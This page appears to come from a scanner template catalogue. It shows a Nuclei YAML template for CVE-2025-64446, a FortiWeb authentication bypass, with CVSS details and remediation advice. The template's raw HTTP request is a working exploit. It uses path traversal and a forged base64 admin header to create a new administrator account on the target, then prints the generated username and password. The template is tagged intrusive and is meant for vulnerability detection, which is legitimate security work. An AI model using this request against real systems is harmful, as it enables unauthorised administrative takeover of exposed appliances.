FortiWeb - Authentication Bypass
CVE-2025-64446
Early Release
Description
A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.
Severity
Critical
CVSS Score
9.8
Published Date
November 14, 2025
Template Author
dhiyaneshdk, watchtowr, rapid7
+1
CVE-2025-64446.yaml
id: CVE-2025-64446
info:
name: FortiWeb - Authentication Bypass
author: DhiyaneshDk,watchTowr,rapid7,defusedcyber
severity: critical
description: |
A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.
impact: |
Attackers can execute administrative commands remotely, potentially leading to full system compromise.
remediation: |
Update to the latest FortiWeb version beyond 8.0.1.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-64446
- https://x.com/defusedcyber/status/1975242250373517373
- https://github.com/watchtowrlabs/watchTowr-vs-Fortiweb-AuthBypass
- https://github.com/rapid7/metasploit-framework/pull/20698/files
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-64446
cwe-id: CWE-23
cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"FortiWeb - "
tags: cve,cve2025,vuln,fortiweb,fortigate,intrusive,auth-bypass
variables:
username: "{{to_lower(rand_text_alpha(8))}}"
password: "{{to_lower(rand_text_alpha(8))}}"
http:
- raw:
- |
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: {{Hostname}}
CGIINFO: eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==
Content-Type: application/json
{
"data": {
"q_type": 1,
"name": "{{username}}",
"access-profile": "prof_admin",
"access-profile_val": "0",
"trusthostv4": "0.0.0.0/0",
"trusthostv6": "::/0",
"last-name": "",
"first-name": "",
"email-address": "",
"phone-number": "",
"mobile-number": "",
"hidden": 0,
"comments": "",
"sz_dashboard": -1,
"type": "local-user",
"type_val": "0",
"admin-usergrp_val": "0",
"wildcard_val": "0",
"accprofile-override_val": "0",
"sshkey": "",
"trusthostv4": "127.0.0.1/8",
"trusthostv6": "::1/128",
"passwd-set-time": 0,
"history-password-pos": 0,
"history-password0": "",
"history-password1": "",
"history-password2": "",
"history-password3": "",
"history-password4": "",
"history-password5": "",
"history-password6": "",
"history-password7": "",
"history-password8": "",
"history-password9": "",
"force-password-change": "disable",
"force-password-change_val": "0",
"password": "{{password}}"
}
}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"results":'
- '"can_clone":'
condition: and
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- '"USERNAME: "+ username'
- '"PASSWORD: "+ password'
# digest: 490a00463044022053bf526c1024e22493a08ede8c464007744022343f733383c2c498e2d99e3ad002203807da6b2e88b4e6ea38da017e4ed6326d090f1cc79e80d7eb6a74b5d045e6fe:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2025-64446
CWE ID:
cwe-23
Remediation Steps
Update to the latest FortiWeb version beyond 8.0.1.